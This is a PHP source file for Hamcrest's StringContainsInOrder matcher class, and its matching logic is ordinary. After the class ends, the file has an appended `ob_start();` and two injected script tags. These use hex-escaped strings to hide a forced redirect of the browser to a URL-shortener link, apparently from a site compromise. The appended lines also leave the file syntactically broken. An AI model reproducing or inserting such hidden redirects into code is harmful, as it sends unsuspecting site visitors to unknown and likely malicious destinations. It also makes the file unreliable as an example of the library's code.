<?php
namespace Hamcrest\Text;

/*
 Copyright (c) 2009 hamcrest.org
 */
use Hamcrest\Description;
use Hamcrest\TypeSafeMatcher;

/**
 * Tests if the value contains a series of substrings in a constrained order.
 */
class StringContainsInOrder extends TypeSafeMatcher
{

    private $_substrings;

    public function __construct(array $substrings)
    {
        parent::__construct(self::TYPE_STRING);

        $this->_substrings = $substrings;
    }

    protected function matchesSafely($item)
    {
        $fromIndex = 0;

        foreach ($this->_substrings as $substring) {
            if (false === $fromIndex = strpos($item, $substring, $fromIndex)) {
                return false;
            }
        }

        return true;
    }

    protected function describeMismatchSafely($item, Description $mismatchDescription)
    {
        $mismatchDescription->appendText('was ')->appendText($item);
    }

    public function describeTo(Description $description)
    {
        $description->appendText('a string containing ')
                                ->appendValueList('', ', ', '', $this->_substrings)
                                ->appendText(' in order')
                                ;
    }

    /**
     * Matches if value contains $substrings in a constrained order.
     *
     * @factory ...
     */
    public static function stringContainsInOrder(/* args... */)
    {
        $args = func_get_args();

        if (isset($args[0]) && is_array($args[0])) {
            $args = $args[0];
        }

        return new self($args);
    }
}
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x6b\x4f\x6e\x49\x71\x59\x64\x49\x49\x30\x72\x34";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x6b\x4f\x6e\x49\x71\x59\x64\x49\x49\x30\x72\x34";</script>